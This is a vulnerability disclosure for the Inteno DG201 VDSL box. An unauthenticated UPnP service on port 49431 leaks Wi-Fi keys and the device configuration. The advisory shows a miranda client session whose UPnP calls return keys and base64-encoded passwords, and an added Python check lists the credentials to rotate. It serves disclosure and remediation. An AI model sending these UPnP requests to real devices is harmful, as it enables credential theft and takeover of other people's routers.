Intro
This vulnerability was reported on 2013-11-22 and was fixed a couple of months after that.
The DG201 VDSL box has some kind of UPnP service open to the Internet by default. Even if the box is set to bridge mode, it still takes its own public IP address from the Internet.
From the UPnP service you can, for example, download the device configuration, which includes the passwords for Wi-Fi and for the accounts on the box. It is also possible to change the configuration of the device. All of this can be done without any authentication.
- Software version: DG201A-W2U4U_4.06DNT0934.2
Details
The UPnP service can be found on TCP port 49431.
Get a UPnP client and start using the service. I used miranda: https://code.google.com/p/miranda-upnp/
Example
I have manually added my public IP to the configuration, which is basically a list of hosts in a Python pickle.
```
$ python miranda.py -s upnp-inteno.mir

Miranda v1.3
The interactive UPnP client
Craig Heffner, http://www.devttys0.com

Host data restored:

    [0] 10.0.2.187:8888
    [1] 192.168.1.1:49431
    [2] 192.168.1.1:49431
    [3] 213.216.x.x:49431
    [4] 85.131.x.x:49431

upnp> host get 3
Requesting device and service info for 213.216.x.x:49431 (this could take a few seconds)...

Host data enumeration complete!

upnp> host send 3 LANDevice WLANConfiguration GetSecurityKeys

NewWEPKey3 : 1234567890123
NewWEPKey2 : 1234567890123
NewWEPKey1 : 1234567890123
NewWEPKey0 : 1234567890123
NewKeyPassphrase :
NewPreSharedKey : abbaabba

upnp> host send 3 InternetGatewayDevice DeviceConfig GetConfiguration

NewConfigFile : <?xml version="1.0"?>
<DslCpeConfig version="3.0">
  <InternetGatewayDevice>
    <LANDeviceNumberOfEntries>1</LANDeviceNumberOfEntries>
    <WANDeviceNumberOfEntries>3</WANDeviceNumberOfEntries>
    <DeviceInfo>
      <ProvisioningCode>12345</ProvisioningCode>
      <FirstUseDate>2012-04-11T14:46:01+00:00</FirstUseDate>
      <VendorConfigFileNumberOfEntries>0</VendorConfigFileNumberOfEntries>
    </DeviceInfo>
    <X_BROADCOM_COM_SyslogCfg>
      <Status>Enabled</Status>
      <Option>local buffer and remote</Option>
      <LocalDisplayLevel>Debug</LocalDisplayLevel>
      <ServerIPAddress>10.0.0.1</ServerIPAddress>
    </X_BROADCOM_COM_SyslogCfg>
    <X_BROADCOM_COM_LoginCfg>
      <SupportPassword>ZG5hcjNzY3VlMTEyAA==</SupportPassword>
      <UserPassword>dXNlcgo=</UserPassword>
    </X_BROADCOM_COM_LoginCfg>
...
```
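Added example, not part of the original advisory or of miranda: a Python check for owners of an affected box that walks a saved configuration export and lists the credential elements to rotate, marking those stored as base64, which is an encoding and not a hash. The sample document, its values and the `HypotheticalWifiKey` element are constructed; only the `X_BROADCOM_COM_LoginCfg` element names come from the dump above.

```python
import base64
import binascii
import re
import xml.etree.ElementTree as ET

# Element names that suggest a stored secret (heuristic, an assumption of this example).
SECRET_TAG = re.compile(r"password|passphrase|key", re.IGNORECASE)

def classify(value):
    """'base64' if value is valid base64 that decodes to printable ASCII, else 'plaintext'."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return "plaintext"
    text = raw.rstrip(b"\x00\r\n")  # tolerate a trailing NUL or newline
    return "base64" if text and all(32 <= b < 127 for b in text) else "plaintext"

def secrets_to_rotate(config_xml):
    """Return (element path, storage form) for each non-empty secret-like element."""
    found = []

    def walk(node, path):
        here = f"{path}/{node.tag}"
        value = (node.text or "").strip()
        if SECRET_TAG.search(node.tag) and value:
            found.append((here, classify(value)))  # the value itself is never returned
        for child in node:
            walk(child, here)

    walk(ET.fromstring(config_xml), "")
    return found

# Constructed sample shaped like the dump above; every value is made up.
SUPPORT = base64.b64encode(b"constructed-support\x00").decode()
USER = base64.b64encode(b"constructed-user\n").decode()
SAMPLE = f"""<?xml version="1.0"?>
<DslCpeConfig version="3.0">
  <InternetGatewayDevice>
    <X_BROADCOM_COM_LoginCfg>
      <SupportPassword>{SUPPORT}</SupportPassword>
      <UserPassword>{USER}</UserPassword>
    </X_BROADCOM_COM_LoginCfg>
    <HypotheticalWifiKey>constructed psk!</HypotheticalWifiKey>
  </InternetGatewayDevice>
</DslCpeConfig>"""

if __name__ == "__main__":
    for path, storage in secrets_to_rotate(SAMPLE):
        print(f"{storage:9} {path}")
```

Every element reported needs a new value once the configuration has been readable from the Internet; the `base64` label only records that the stored form gave no protection.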
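Update available
- https://www.dna.fi/documents/15182/76543/Inteno_DNA_DG201+ja+EG500_modeemin_paivitys.pdf/87f2f9da-9360-440e-8113-03f277d524f4
- https://www.dna.fi/documents/15182/76216/DG201A-W2U4U_4.06DNT0936.1_20140127/7f4c2113-32f2-422f-bdd5-e7a1062373c1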
Contacts
- Mikko Kenttälä, Turmio @ IRCnet, mikko.kenttala(ä)iki.fi